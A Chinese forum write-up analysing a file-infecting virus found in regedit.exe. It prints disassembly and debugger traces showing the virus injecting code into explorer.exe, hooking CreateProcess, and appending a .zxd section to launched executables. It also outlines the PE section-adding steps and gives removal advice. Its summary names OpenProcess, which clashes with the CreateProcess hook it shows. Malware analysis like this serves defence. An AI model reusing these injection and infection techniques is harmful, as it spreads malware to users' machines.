【文章标题】: 对一感染型病毒的分析 【文章作者】:willJ 最近拿到一个入门级的病毒样本,自己记录了下分析过程,与各位52的朋友分享。 样本是一个regedit.exe,看了下也是Windows下面的注册表管理器,但是仔细分析可以发现与原版的还是有区别的,入口点比较: 原版的入口点 被感染后的入口点 再看看区段吧 原版的区段表 被感染后的,明显多出了一个.zxd区段 从这些地方可以很快的判断这个文件被感染了,直接上OD开始分析吧 01063000 > 55 push ebp
01063001 8BEC mov ebp,esp
01063003 81EC 00100000 sub esp,0x1000
01063009 60 pushad
0106300A C645 D8 00 mov byte ptr ss:[ebp-0x28],0x0
0106300E 33C0 xor eax,eax
01063010 8945 D9 mov dword ptr ss:[ebp-0x27],eax
01063013 8945 DD mov dword ptr ss:[ebp-0x23],eax
01063016 8945 E1 mov dword ptr ss:[ebp-0x1F],eax
01063019 66:8945 E5 mov word ptr ss:[ebp-0x1B],ax
0106301D 8845 E7 mov byte ptr ss:[ebp-0x19],al
01063020 C745 D0 0000000>mov dword ptr ss:[ebp-0x30],0x0
01063027 C745 D4 0000000>mov dword ptr ss:[ebp-0x2C],0x0
0106302E C745 C0 0000000>mov dword ptr ss:[ebp-0x40],0x0
01063035 C745 C4 0000000>mov dword ptr ss:[ebp-0x3C],0x0
0106303C C745 F8 0000000>mov dword ptr ss:[ebp-0x8],0x0
01063043 C745 BC 0000000>mov dword ptr ss:[ebp-0x44],0x0
0106304A C745 E8 0000000>mov dword ptr ss:[ebp-0x18],0x0
01063051 C745 F0 0000000>mov dword ptr ss:[ebp-0x10],0x0
01063058 C745 FC 0000000>mov dword ptr ss:[ebp-0x4],0x0
0106305F C745 EC 0000000>mov dword ptr ss:[ebp-0x14],0x0
01063066 C745 CC 0000000>mov dword ptr ss:[ebp-0x34],0x0
0106306D C745 C8 0000000>mov dword ptr ss:[ebp-0x38],0x0
01063074 C745 F4 0000000>mov dword ptr ss:[ebp-0xC],0x0
0106307B 8D35 F8154000 lea esi,dword ptr ds:[0x4015F8]
01063081 56 push esi
01063082 E8 8D080000 call regedit.01063914 ; 获取kernel32.dll字符串
01063087 50 push eax
01063088 E8 EA060000 call regedit.01063777 ; 获取kernel32.dll基址
0106308D 85C0 test eax,eax
0106308F 0F84 9D020000 je regedit.01063332
01063095 8945 D0 mov dword ptr ss:[ebp-0x30],eax
01063098 8D35 10164000 lea esi,dword ptr ds:[0x401610]
0106309E 56 push esi
0106309F E8 70080000 call regedit.01063914 ; 获取GetProcAddress字符串
010630A4 50 push eax
010630A5 8B5D D0 mov ebx,dword ptr ss:[ebp-0x30]
010630A8 53 push ebx
010630A9 E8 7C070000 call regedit.0106382A ; 获取GetProcaddress基址
010630AE 85C0 test eax,eax
010630B0 0F84 7C020000 je regedit.01063332
010630B6 8945 C0 mov dword ptr ss:[ebp-0x40],eax
010630B9 8D35 E0164000 lea esi,dword ptr ds:[0x4016E0]
010630BF 56 push esi
010630C0 E8 4F080000 call regedit.01063914 ; 获取ReadProcessMemory字符串
010630C5 50 push eax
010630C6 FF75 D0 push dword ptr ss:[ebp-0x30]
010630C9 FF55 C0 call dword ptr ss:[ebp-0x40]
010630CC 85C0 test eax,eax
010630CE 0F84 5E020000 je regedit.01063332
010630D4 8945 BC mov dword ptr ss:[ebp-0x44],eax
010630D7 8D35 0D174000 lea esi,dword ptr ds:[0x40170D]
010630DD 56 push esi
010630DE E8 31080000 call regedit.01063914 ; 获取WriteProcessMemory字符串
010630E3 50 push eax
010630E4 FF75 D0 push dword ptr ss:[ebp-0x30]
010630E7 FF55 C0 call dword ptr ss:[ebp-0x40]
010630EA 85C0 test eax,eax
010630EC 0F84 40020000 je regedit.01063332
010630F2 8945 E8 mov dword ptr ss:[ebp-0x18],eax
010630F5 8D35 7E164000 lea esi,dword ptr ds:[0x40167E]
010630FB 56 push esi
010630FC E8 13080000 call regedit.01063914 ; 获取VirtualProtect字符串
01063101 50 push eax
01063102 FF75 D0 push dword ptr ss:[ebp-0x30]
01063105 FF55 C0 call dword ptr ss:[ebp-0x40]
01063108 85C0 test eax,eax
0106310A 0F84 22020000 je regedit.01063332
01063110 8945 C4 mov dword ptr ss:[ebp-0x3C],eax
01063113 8D35 8D164000 lea esi,dword ptr ds:[0x40168D]
01063119 56 push esi
0106311A E8 F5070000 call regedit.01063914 ; 获取VirtualProtectEx字符串
0106311F 50 push eax
01063120 FF75 D0 push dword ptr ss:[ebp-0x30]
01063123 FF55 C0 call dword ptr ss:[ebp-0x40]
01063126 85C0 test eax,eax
01063128 0F84 04020000 je regedit.01063332
0106312E 8945 F8 mov dword ptr ss:[ebp-0x8],eax
01063131 8D35 1F164000 lea esi,dword ptr ds:[0x40161F]
01063137 56 push esi
01063138 E8 D7070000 call regedit.01063914 ; 获取LoadLibraryA字符串
0106313D 50 push eax
0106313E FF75 D0 push dword ptr ss:[ebp-0x30]
01063141 FF55 C0 call dword ptr ss:[ebp-0x40]
01063144 85C0 test eax,eax
01063146 0F84 E6010000 je regedit.01063332
0106314C 8945 F0 mov dword ptr ss:[ebp-0x10],eax
0106314F 8D35 05164000 lea esi,dword ptr ds:[0x401605]
01063155 56 push esi
01063156 E8 B9070000 call regedit.01063914 ; 获取user32.dll字符串
0106315B 50 push eax
0106315C FF55 F0 call dword ptr ss:[ebp-0x10]
0106315F 85C0 test eax,eax
01063161 0F84 CB010000 je regedit.01063332
01063167 8945 D4 mov dword ptr ss:[ebp-0x2C],eax
0106316A 8D35 2C164000 lea esi,dword ptr ds:[0x40162C]
01063170 56 push esi
01063171 E8 9E070000 call regedit.01063914 ; 获取MessageBox字符串
01063176 50 push eax
01063177 FF75 D4 push dword ptr ss:[ebp-0x2C]
0106317A FF55 C0 call dword ptr ss:[ebp-0x40]
0106317D 85C0 test eax,eax
0106317F 0F84 AD010000 je regedit.01063332
01063185 8945 EC mov dword ptr ss:[ebp-0x14],eax
01063188 8D1D 10104000 lea ebx,dword ptr ds:[0x401010]
0106318E 53 push ebx
0106318F E8 80070000 call regedit.01063914 ; 获取程序原始入口点
01063194 8DBD F4FFFFFF lea edi,dword ptr ss:[ebp-0xC]
0106319A 57 push edi
0106319B 6A 40 push 0x40
0106319D 68 00200000 push 0x2000
010631A2 50 push eax
010631A3 FF55 C4 call dword ptr ss:[ebp-0x3C]
010631A6 85C0 test eax,eax
010631A8 0F84 84010000 je regedit.01063332
010631AE FF75 C0 push dword ptr ss:[ebp-0x40]
010631B1 FF75 D0 push dword ptr ss:[ebp-0x30]
010631B4 8D9D C8FFFFFF lea ebx,dword ptr ss:[ebp-0x38]
010631BA 53 push ebx
010631BB 8D35 9E164000 lea esi,dword ptr ds:[0x40169E]
010631C1 56 push esi
010631C2 E8 4D070000 call regedit.01063914 ; 获取explorer.exe字符串
前面这些都是经典的shellcode的获取方法,获取了程序所想要的API,最后获取了explorer.exe,将要去explorer.exe做操作,但是我不方便对explorer.exe进行调试,所以我手动将这个字符串换成了cmd.exe,这样方便我调试多了: 然后再开一个OD,打开cmd,用另外的那个OD将cmd进程附加进去,继续回到病毒体的OD里调试,发现主要是通过WriteProcessMemory进行修改目标进程。 第一次WriteProcessMemory: 0006C96C 0106458D /CALL 到 WriteProcessMemory 来自 regedit.01064587
0006C970 0000005C |hProcess = 0000005C
0006C974 009D0000 |Address = 9D0000
0006C978 01063000 |Buffer = offset regedit.<ModuleEntryPoint>
0006C97C 000018AA |BytesToWrite = 18AA (6314.)
0006C980 00000000 \pBytesWritten = NULL
目标地址是9d0000,我们在附加cmd的OD里跳到这个地方去,看看变成了什么样 009D0000 55 push ebp
009D0001 8BEC mov ebp,esp
009D0003 81EC 00100000 sub esp,0x1000
009D0009 60 pushad
009D000A C645 D8 00 mov byte ptr ss:[ebp-0x28],0x0
009D000E 33C0 xor eax,eax
009D0010 8945 D9 mov dword ptr ss:[ebp-0x27],eax
009D0013 8945 DD mov dword ptr ss:[ebp-0x23],eax
009D0016 8945 E1 mov dword ptr ss:[ebp-0x1F],eax
009D0019 66:8945 E5 mov word ptr ss:[ebp-0x1B],ax
009D001D 8845 E7 mov byte ptr ss:[ebp-0x19],al
009D0020 C745 D0 0000000>mov dword ptr ss:[ebp-0x30],0x0
009D0027 C745 D4 0000000>mov dword ptr ss:[ebp-0x2C],0x0
009D002E C745 C0 0000000>mov dword ptr ss:[ebp-0x40],0x0
009D0035 C745 C4 0000000>mov dword ptr ss:[ebp-0x3C],0x0
009D003C C745 F8 0000000>mov dword ptr ss:[ebp-0x8],0x0
009D0043 C745 BC 0000000>mov dword ptr ss:[ebp-0x44],0x0
009D004A C745 E8 0000000>mov dword ptr ss:[ebp-0x18],0x0
009D0051 C745 F0 0000000>mov dword ptr ss:[ebp-0x10],0x0
009D0058 C745 FC 0000000>mov dword ptr ss:[ebp-0x4],0x0
009D005F C745 EC 0000000>mov dword ptr ss:[ebp-0x14],0x0
009D0066 C745 CC 0000000>mov dword ptr ss:[ebp-0x34],0x0
009D006D C745 C8 0000000>mov dword ptr ss:[ebp-0x38],0x0
009D0074 C745 F4 0000000>mov dword ptr ss:[ebp-0xC],0x0
009D007B 8D35 F8154000 lea esi,dword ptr ds:[0x4015F8]
009D0081 56 push esi
009D0082 E8 8D080000 call 009D0914
009D0087 50 push eax
009D0088 E8 EA060000 call 009D0777
009D008D 85C0 test eax,eax
009D008F 0F84 9D020000 je 009D0332
009D0095 8945 D0 mov dword ptr ss:[ebp-0x30],eax
009D0098 8D35 10164000 lea esi,dword ptr ds:[0x401610]
被注入了代码,在9d0000地方下一个断点吧,看看后面会有什么操作 第二次WriteProcessMemory 0006EF88 010632CF /CALL 到 WriteProcessMemory 来自 regedit.010632CC
0006EF8C 0000005C |hProcess = 0000005C
0006EF90 7C802336 |Address = 7C802336
0006EF94 0006FF98 |Buffer = 0006FF98
0006EF98 00000006 |BytesToWrite = 6
0006EF9C 00000000 \pBytesWritten = NULL
看见了目标地址是7c802336,去附加cmd的OD里跳到7c802336,发现是API CreateProcess的入口: 7C802336 > 8BFF mov edi,edi
7C802338 55 push ebp
7C802339 8BEC mov ebp,esp
7C80233B 6A 00 push 0x0
7C80233D FF75 2C push dword ptr ss:[ebp+0x2C]
7C802340 FF75 28 push dword ptr ss:[ebp+0x28]
7C802343 FF75 24 push dword ptr ss:[ebp+0x24]
7C802346 FF75 20 push dword ptr ss:[ebp+0x20]
7C802349 FF75 1C push dword ptr ss:[ebp+0x1C]
7C80234C FF75 18 push dword ptr ss:[ebp+0x18]
7C80234F FF75 14 push dword ptr ss:[ebp+0x14]
7C802352 FF75 10 push dword ptr ss:[ebp+0x10]
7C802355 FF75 0C push dword ptr ss:[ebp+0xC]
7C802358 FF75 08 push dword ptr ss:[ebp+0x8]
7C80235B 6A 00 push 0x0
7C80235D E8 3A740100 call kernel32.CreateProcessInternalW
7C802362 5D pop ebp
7C802363 C2 2800 retn 0x28
经过WriteProcessMemory后: 7C802336 >- E9 00E01C84 jmp 009D033B
7C80233B 0000 add byte ptr ds:[eax],al
7C80233D FF75 2C push dword ptr ss:[ebp+0x2C]
7C802340 FF75 28 push dword ptr ss:[ebp+0x28]
7C802343 FF75 24 push dword ptr ss:[ebp+0x24]
7C802346 FF75 20 push dword ptr ss:[ebp+0x20]
7C802349 FF75 1C push dword ptr ss:[ebp+0x1C]
7C80234C FF75 18 push dword ptr ss:[ebp+0x18]
7C80234F FF75 14 push dword ptr ss:[ebp+0x14]
7C802352 FF75 10 push dword ptr ss:[ebp+0x10]
7C802355 FF75 0C push dword ptr ss:[ebp+0xC]
7C802358 FF75 08 push dword ptr ss:[ebp+0x8]
7C80235B 6A 00 push 0x0
7C80235D E8 3A740100 call kernel32.CreateProcessInternalW
7C802362 5D pop ebp
7C802363 C2 2800 retn 0x28
原来是改了跳转的,将其改来跳向它的恶意代码的地方。 第三次WriteProcessMemory 0006EF88 0106330D /CALL 到 WriteProcessMemory 来自 regedit.0106330A
0006EF8C 0000005C |hProcess = 0000005C
0006EF90 4AD00018 |Address = 4AD00018
0006EF94 0006FF98 |Buffer = 0006FF98
0006EF98 00000004 |BytesToWrite = 4
0006EF9C 00000000 \pBytesWritten = NULL
接着病毒母体弹出一个MessageBox 箭头1弹出MessageBox,箭头2跳回到程序的原始入口点,正常执行代码。 接着我们看看它劫持了cmd又做了什么吧,我们用cmd打开一个正常的notepad(我将notepad复制了一份放桌面),程序以运行便断了下来: 7C802336 >- E9 00E01C84 jmp 009D033B
7C80233B 0000 add byte ptr ds:[eax],al
7C80233D FF75 2C push dword ptr ss:[ebp+0x2C]
7C802340 FF75 28 push dword ptr ss:[ebp+0x28]
7C802343 FF75 24 push dword ptr ss:[ebp+0x24]
7C802346 FF75 20 push dword ptr ss:[ebp+0x20]
7C802349 FF75 1C push dword ptr ss:[ebp+0x1C]
7C80234C FF75 18 push dword ptr ss:[ebp+0x18]
7C80234F FF75 14 push dword ptr ss:[ebp+0x14]
7C802352 FF75 10 push dword ptr ss:[ebp+0x10]
7C802355 FF75 0C push dword ptr ss:[ebp+0xC]
7C802358 FF75 08 push dword ptr ss:[ebp+0x8]
7C80235B 6A 00 push 0x0
7C80235D E8 3A740100 call kernel32.CreateProcessInternalW
7C802362 5D pop ebp
7C802363 C2 2800 retn 0x28
果然断在了CreateProcess的首地址,然后jmp 009D033B是跳向它的恶意代码的地方 009D033B 55 push ebp
009D033C 8BEC mov ebp,esp
009D033E 81EC 00100000 sub esp,0x1000
009D0344 C785 E0FEFFFF 0>mov dword ptr ss:[ebp-0x120],0x0
009D034E C745 B4 0000000>mov dword ptr ss:[ebp-0x4C],0x0
009D0355 C685 D0FEFFFF 0>mov byte ptr ss:[ebp-0x130],0x0
009D035C 33C9 xor ecx,ecx
009D035E 898D D1FEFFFF mov dword ptr ss:[ebp-0x12F],ecx
009D0364 66:898D D5FEFFF>mov word ptr ss:[ebp-0x12B],cx
009D036B 888D D7FEFFFF mov byte ptr ss:[ebp-0x129],cl
009D0371 C685 ECFEFFFF 0>mov byte ptr ss:[ebp-0x114],0x0
009D0378 B9 2F000000 mov ecx,0x2F
009D037D 33C0 xor eax,eax
009D037F 8DBD EDFEFFFF lea edi,dword ptr ss:[ebp-0x113]
009D0385 F3:AB rep stos dword ptr es:[edi]
009D0387 66:AB stos word ptr es:[edi]
009D0389 AA stos byte ptr es:[edi]
009D038A C785 E8FEFFFF 0>mov dword ptr ss:[ebp-0x118],0x0
009D0394 C745 B0 0000000>mov dword ptr ss:[ebp-0x50],0x0
009D039B C745 B8 0000000>mov dword ptr ss:[ebp-0x48],0x0
009D03A2 C785 E4FEFFFF 0>mov dword ptr ss:[ebp-0x11C],0x0
009D03AC C785 D8FEFFFF 0>mov dword ptr ss:[ebp-0x128],0x0
009D03B6 C745 AC 0000000>mov dword ptr ss:[ebp-0x54],0x0
009D03BD C785 DCFEFFFF 0>mov dword ptr ss:[ebp-0x124],0x0
009D03C7 8D35 F8154000 lea esi,dword ptr ds:[0x4015F8]
009D03CD 56 push esi
009D03CE E8 41050000 call 009D0914 ; 获取kernel32.dll字符串
009D03D3 50 push eax
009D03D4 E8 9E030000 call 009D0777 ; 获取kernel32.dll基址
009D03D9 85C0 test eax,eax
009D03DB 0F84 89010000 je 009D056A
009D03E1 8985 E8FEFFFF mov dword ptr ss:[ebp-0x118],eax
009D03E7 8D35 10164000 lea esi,dword ptr ds:[0x401610]
009D03ED 56 push esi
009D03EE E8 21050000 call 009D0914 ; 获取GetProcAddress字符串
009D03F3 50 push eax
009D03F4 FFB5 E8FEFFFF push dword ptr ss:[ebp-0x118]
009D03FA E8 2B040000 call 009D082A ; 获取GetProcAddress基址
009D03FF 85C0 test eax,eax
009D0401 0F84 63010000 je 009D056A
009D0407 8945 B0 mov dword ptr ss:[ebp-0x50],eax
009D040A 8D35 7E164000 lea esi,dword ptr ds:[0x40167E]
009D0410 56 push esi
009D0411 E8 FE040000 call 009D0914 ; 获取VirualProtect字符串
009D0416 50 push eax
009D0417 8B9D E8FEFFFF mov ebx,dword ptr ss:[ebp-0x118]
009D041D 53 push ebx
009D041E FF55 B0 call dword ptr ss:[ebp-0x50]
009D0421 85C0 test eax,eax
009D0423 0F84 41010000 je 009D056A
009D0429 8945 B8 mov dword ptr ss:[ebp-0x48],eax
009D042C 8D35 2F174000 lea esi,dword ptr ds:[0x40172F]
009D0432 56 push esi
009D0433 E8 DC040000 call 009D0914 ; 获取WideCharToMultiByte字符串
009D0438 50 push eax
009D0439 8B9D E8FEFFFF mov ebx,dword ptr ss:[ebp-0x118]
009D043F 53 push ebx
009D0440 FF55 B0 call dword ptr ss:[ebp-0x50]
009D0443 85C0 test eax,eax
009D0445 0F84 1F010000 je 009D056A
009D044B 8985 E4FEFFFF mov dword ptr ss:[ebp-0x11C],eax
009D0451 8D35 1F164000 lea esi,dword ptr ds:[0x40161F]
009D0457 56 push esi
009D0458 E8 B7040000 call 009D0914 ; 获取LoadLibraryA字符串
009D045D 50 push eax
009D045E 8B9D E8FEFFFF mov ebx,dword ptr ss:[ebp-0x118]
009D0464 53 push ebx
009D0465 FF55 B0 call dword ptr ss:[ebp-0x50]
009D0468 85C0 test eax,eax
009D046A 0F84 FA000000 je 009D056A
009D0470 8985 D8FEFFFF mov dword ptr ss:[ebp-0x128],eax
009D0476 8D35 05164000 lea esi,dword ptr ds:[0x401605]
009D047C 56 push esi
009D047D E8 92040000 call 009D0914 ; 获取User32.dll字符串
009D0482 50 push eax
009D0483 FF95 D8FEFFFF call dword ptr ss:[ebp-0x128]
009D0489 85C0 test eax,eax
009D048B 0F84 D9000000 je 009D056A
009D0491 8945 AC mov dword ptr ss:[ebp-0x54],eax
009D0494 8D35 2C164000 lea esi,dword ptr ds:[0x40162C]
009D049A 56 push esi
009D049B E8 74040000 call 009D0914 ; 获取MessageBox字符串
009D04A0 50 push eax
009D04A1 FF75 AC push dword ptr ss:[ebp-0x54]
009D04A4 FF55 B0 call dword ptr ss:[ebp-0x50]
又是一个shellcode获取API的过程。 接着009D053d就是程序的感染代码处了: 009D0930 55 push ebp
009D0931 8BEC mov ebp,esp
009D0933 81EC 00200000 sub esp,0x2000
009D0939 C785 20FEFFFF 0>mov dword ptr ss:[ebp-0x1E0],0x0
009D0943 C785 24FEFFFF 0>mov dword ptr ss:[ebp-0x1DC],0x0
009D094D C785 34FEFFFF 0>mov dword ptr ss:[ebp-0x1CC],0x0
009D0957 C785 38FEFFFF 0>mov dword ptr ss:[ebp-0x1C8],0x0
009D0961 C785 1CFEFFFF 0>mov dword ptr ss:[ebp-0x1E4],0x0
009D096B C785 14FEFFFF 0>mov dword ptr ss:[ebp-0x1EC],0x0
009D0975 C785 48FEFFFF 0>mov dword ptr ss:[ebp-0x1B8],0x0
009D097F C785 28FEFFFF 0>mov dword ptr ss:[ebp-0x1D8],0x0
009D0989 C785 4CFEFFFF 0>mov dword ptr ss:[ebp-0x1B4],0x0
009D0993 C785 30FEFFFF 0>mov dword ptr ss:[ebp-0x1D0],0x0
009D099D C785 40FEFFFF 0>mov dword ptr ss:[ebp-0x1C0],0x0
009D09A7 C785 2CFEFFFF 0>mov dword ptr ss:[ebp-0x1D4],0x0
009D09B1 C785 44FEFFFF 0>mov dword ptr ss:[ebp-0x1BC],0x0
009D09BB C785 18FEFFFF 0>mov dword ptr ss:[ebp-0x1E8],0x0
009D09C5 C785 50FEFFFF 0>mov dword ptr ss:[ebp-0x1B0],0x0
009D09CF C785 3CFEFFFF 0>mov dword ptr ss:[ebp-0x1C4],0x0
009D09D9 8D35 38164000 lea esi,dword ptr ds:[0x401638]
009D09DF 56 push esi
009D09E0 E8 2FFFFFFF call 009D0914 ; 获取CreateFile字符串
009D09E5 50 push eax
009D09E6 FF75 0C push dword ptr ss:[ebp+0xC]
009D09E9 FF55 10 call dword ptr ss:[ebp+0x10]
009D09EC 85C0 test eax,eax
009D09EE 0F84 2F030000 je 009D0D23
009D09F4 8985 20FEFFFF mov dword ptr ss:[ebp-0x1E0],eax
009D09FA 8D35 44164000 lea esi,dword ptr ds:[0x401644]
009D0A00 56 push esi
009D0A01 E8 0EFFFFFF call 009D0914 ; 获取SetFilePointer字符串
009D0A06 50 push eax
009D0A07 FF75 0C push dword ptr ss:[ebp+0xC]
009D0A0A FF55 10 call dword ptr ss:[ebp+0x10]
009D0A0D 85C0 test eax,eax
009D0A0F 0F84 0E030000 je 009D0D23
009D0A15 8985 24FEFFFF mov dword ptr ss:[ebp-0x1DC],eax
009D0A1B 8D35 72164000 lea esi,dword ptr ds:[0x401672]
009D0A21 56 push esi
009D0A22 E8 EDFEFFFF call 009D0914 ; 获取CloseHandle字符串
009D0A27 50 push eax
009D0A28 FF75 0C push dword ptr ss:[ebp+0xC]
009D0A2B FF55 10 call dword ptr ss:[ebp+0x10]
009D0A2E 85C0 test eax,eax
009D0A30 0F84 ED020000 je 009D0D23
009D0A36 8985 48FEFFFF mov dword ptr ss:[ebp-0x1B8],eax
009D0A3C 8D35 53164000 lea esi,dword ptr ds:[0x401653]
009D0A42 56 push esi
009D0A43 E8 CCFEFFFF call 009D0914 ; 获取ReadFile字符串
009D0A48 50 push eax
009D0A49 FF75 0C push dword ptr ss:[ebp+0xC]
009D0A4C FF55 10 call dword ptr ss:[ebp+0x10]
009D0A4F 85C0 test eax,eax
009D0A51 0F84 CC020000 je 009D0D23
009D0A57 8985 34FEFFFF mov dword ptr ss:[ebp-0x1CC],eax
009D0A5D 8D35 5C164000 lea esi,dword ptr ds:[0x40165C]
009D0A63 56 push esi
009D0A64 E8 ABFEFFFF call 009D0914 ; 获取WriteFile字符串
009D0A69 50 push eax
009D0A6A FF75 0C push dword ptr ss:[ebp+0xC]
009D0A6D FF55 10 call dword ptr ss:[ebp+0x10]
009D0A70 85C0 test eax,eax
009D0A72 0F84 AB020000 je 009D0D23
009D0A78 8985 38FEFFFF mov dword ptr ss:[ebp-0x1C8],eax
009D0A7E 8D35 66164000 lea esi,dword ptr ds:[0x401666]
009D0A84 56 push esi
009D0A85 E8 8AFEFFFF call 009D0914 ; 获取GetFileSize字符串
009D0A8A 50 push eax
009D0A8B FF75 0C push dword ptr ss:[ebp+0xC]
009D0A8E FF55 10 call dword ptr ss:[ebp+0x10]
009D0A91 85C0 test eax,eax
009D0A93 0F84 8A020000 je 009D0D23
009D0A99 8985 1CFEFFFF mov dword ptr ss:[ebp-0x1E4],eax
009D0A9F 8D35 7E164000 lea esi,dword ptr ds:[0x40167E]
009D0AA5 56 push esi
009D0AA6 E8 69FEFFFF call 009D0914 ; 获取VirtualProtect
009D0AAB 50 push eax
009D0AAC FF75 0C push dword ptr ss:[ebp+0xC]
009D0AAF FF55 10 call dword ptr ss:[ebp+0x10]
009D0AB2 85C0 test eax,eax
009D0AB4 0F84 69020000 je 009D0D23
009D0ABA 8985 14FEFFFF mov dword ptr ss:[ebp-0x1EC],eax
009D0AC0 B8 00000000 mov eax,0x0
009D0AC5 50 push eax
009D0AC6 68 80000000 push 0x80
009D0ACB 6A 03 push 0x3
009D0ACD 50 push eax
009D0ACE 6A 00 push 0x0
009D0AD0 68 000000C0 push 0xC0000000
009D0AD5 8B75 08 mov esi,dword ptr ss:[ebp+0x8]
009D0AD8 56 push esi
009D0AD9 FF95 20FEFFFF call dword ptr ss:[ebp-0x1E0] ; CreateFile
这里也是通过shelcode的方式获取了文件操作的API,接着就是对这个文件加了一个zxd区段,将恶意代码拷贝进去。 第一次的WriteFile:
0013BA90 009D1163 /CALL 到 WriteFile 来自 009D1160
0013BA94 000000D4 |hFile = 000000D4 (window)
0013BA98 0013C828 |Buffer = 0013C828
0013BA9C 00000008 |nBytesToWrite = 8
0013BAA0 0013C848 |pBytesWritten = 0013C848
0013BAA4 00000000 \pOverlapped = NULL
第二次WriteFile:
0013BA8C 009D1193 /CALL 到 WriteFile 来自 009D1190
0013BA90 000000D4 |hFile = 000000D4 (window)
0013BA94 0013C828 |Buffer = 0013C828
0013BA98 00000020 |nBytesToWrite = 20 (32.)
0013BA9C 0013C848 |pBytesWritten = 0013C848
0013BAA0 00000000 \pOverlapped = NULL
第三次
0013BA8C 009D1193 /CALL 到 WriteFile 来自 009D1190
0013BA90 000000D4 |hFile = 000000D4 (window)
0013BA94 0013C828 |Buffer = 0013C828
0013BA98 00000020 |nBytesToWrite = 20 (32.)
0013BA9C 0013C848 |pBytesWritten = 0013C848
0013BAA0 00000000 \pOverlapped = NULL
第四次
0013BA8C 009D1193 /CALL 到 WriteFile 来自 009D1190
0013BA90 000000D4 |hFile = 000000D4 (window)
0013BA94 0013C828 |Buffer = 0013C828
0013BA98 00000020 |nBytesToWrite = 20 (32.)
0013BA9C 0013C848 |pBytesWritten = 0013C848
0013BAA0 00000000 \pOverlapped = NULL
第五次
0013BA8C 009D1193 /CALL 到 WriteFile 来自 009D1190
0013BA90 000000D4 |hFile = 000000D4 (window)
0013BA94 0013C828 |Buffer = 0013C828
0013BA98 00000020 |nBytesToWrite = 20 (32.)
0013BA9C 0013C848 |pBytesWritten = 0013C848
0013BAA0 00000000 \pOverlapped = NULL
第六次
0013BA80 009D104D /CALL 到 WriteFile 来自 009D104A
0013BA84 000000D4 |hFile = 000000D4 (window)
0013BA88 0013C83C |Buffer = 0013C83C
0013BA8C 00000028 |nBytesToWrite = 28 (40.)
0013BA90 0013C864 |pBytesWritten = 0013C864
0013BA94 00000000 \pOverlapped = NULL
第七次
0013BA84 009D10A9 /CALL 到 WriteFile 来自 009D10A6
0013BA88 000000D4 |hFile = 000000D4 (window)
0013BA8C 0013C83C |Buffer = 0013C83C
0013BA90 00000002 |nBytesToWrite = 2
0013BA94 0013C864 |pBytesWritten = 0013C864
0013BA98 00000000 \pOverlapped = NULL
第八次
0013BA88 009D10FA /CALL 到 WriteFile 来自 009D10F7
0013BA8C 000000D4 |hFile = 000000D4 (window)
0013BA90 0013C83C |Buffer = 0013C83C
0013BA94 00000004 |nBytesToWrite = 4
0013BA98 0013C864 |pBytesWritten = 0013C864
0013BA9C 00000000 \pOverlapped = NULL
第九次
0013B488 009D0E65 /CALL 到 WriteFile 来自 009D0E62
0013B48C 000000D4 |hFile = 000000D4 (window)
0013B490 0013C888 |Buffer = 0013C888
0013B494 00000000 |nBytesToWrite = 0
0013B498 0013C878 |pBytesWritten = 0013C878
0013B49C 00000000 \pOverlapped = NULL
第十次
0013B490 009D0EE7 /CALL 到 WriteFile 来自 009D0EE4
0013B494 000000D4 |hFile = 000000D4 (window)
0013B498 0013C8A8 |Buffer = 0013C8A8
0013B49C 00000004 |nBytesToWrite = 4
0013B4A0 0013C878 |pBytesWritten = 0013C878
0013B4A4 00000000 \pOverlapped = NULL
前面增加好区段了,第十一次就是将感染代码写入进去,达到感染的效果
第十一次
0013B490 009D0F7C /CALL 到 WriteFile 来自 009D0F79
0013B494 000000D4 |hFile = 000000D4 (window)
0013B498 009D0000 |Buffer = 009D0000
0013B49C 00001A00 |nBytesToWrite = 1A00 (6656.)
0013B4A0 0013C878 |pBytesWritten = 0013C878
0013B4A4 00000000 \pOverlapped = NULL
添加区段的方法总结下就是 1. 修正块表 2. 将NumberOfSections的值增加上你加的区段的个数 3. 增加区块数据 4. 修正映像文件大小 然后程序将恶意代码写入增加的节,再修改入口点。 接着再将notepad调起来: 0013EA94 009D05C9 /CALL 到 CreateProcessW 来自 009D05C3
0013EA98 00159350 |ModuleFileName = "C:\Documents and Settings\Administrator\桌面\notepad.exe"
0013EA9C 00158B40 |CommandLine = ""C:\Documents and Settings\Administrator\桌面\notepad.exe""
0013EAA0 00000000 |pProcessSecurity = NULL
0013EAA4 00000000 |pThreadSecurity = NULL
0013EAA8 00000001 |InheritHandles = TRUE
0013EAAC 00000000 |CreationFlags = 0
0013EAB0 00000000 |pEnvironment = NULL
0013EAB4 4AD34400 |CurrentDir = "C:\Documents and Settings\Administrator"
0013EAB8 0013FB38 |pStartupInfo = 0013FB38
0013EABC 0013FB80 \pProcessInfo = 0013FB80
现在已经分析清楚了这个程序的流程了,现在总结下吧。 恶意程序运行,修改了explorer.exe,将恶意代码通过远程写入进去,然后修改了explorer.exe的kernel32.dll中的OpenProcess这个API,将其入口点修改到先去执行恶意代码。 我们知道,explorer.exe是桌面进程,如果在桌面进程下面执行程序的话就会通过它的OpenProcess打开程序,但是这个被劫持了,就去先执行了恶意代码,将启动的程序感染了。达到了更广的扩散效果。 其实程序也没有做什么破坏作用,就是增加了区段,然后劫持了explorer.exe中kernel32.dll的OpenProcess这个API,然后弹MessageBox来恐吓用户已经中毒,不知道是不是作用编写的原因,老让explorer.exe奔溃。 最后来说下解决方案吧: 手工修复方式: 首先重启电脑,找回原始入口点,通过LoadPE修改入口点就可以修复感染的程序。如果想要进一步修复可以通过16进制编辑器和LoadPe去除区段,修复入口点。 自动修复: 下载杀毒软件,现在完全可以查杀这样的感染程序(不过有的杀毒软件不是修复,而是直接查杀,嘿嘿) 还是有些没有分析好,还请大牛们多多指教,这里谢谢L学长的指点,还有徐学长提供的样本。 样本: 解压密码:52pojie
|